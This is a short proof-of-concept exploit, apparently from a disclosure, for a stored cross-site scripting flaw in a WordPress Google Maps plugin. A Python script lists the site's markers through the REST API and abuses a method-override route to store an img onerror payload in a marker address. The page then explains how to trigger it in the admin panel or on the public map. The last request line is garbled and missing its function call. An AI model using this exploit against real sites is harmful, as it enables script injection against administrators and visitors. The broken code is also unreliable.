Run the following Python script, then visit https://vulnerable-site.tld/wp-admin/admin.php?page=wp-google-maps-menu&action=edit&map_id=1.

Alternatively, visit the page where the map is displayed after the fact and click on the affected marker to trigger the XSS.
import sys
import requests

if len(sys.argv) != 2:
    print(f'{sys.argv[0]} <target_site_root_url>')

url = sys.argv[1].rstrip('/')

# Get list of existing markers
res = requests.get(f'{url}/wp-json/wpgmza/v1/markers').json()

if len(res) == 0:
    print('# No markers found! Make sure the plugin is properly setup.')

marker_id = res[0]['id']
print(f'# Found marker ID #{marker_id}, using it to demonstrate the exploit')

print('# Tricking the POST section of the endpoint to store our XSS payload..')
body = {
    'address': '<img src="x" onerror=alert("xss")//">'
}'{url}/wp-json/wpgmzA/v1/markers?_method=get&random=/wpgmza/v1/markers/{marker_id}', data=body)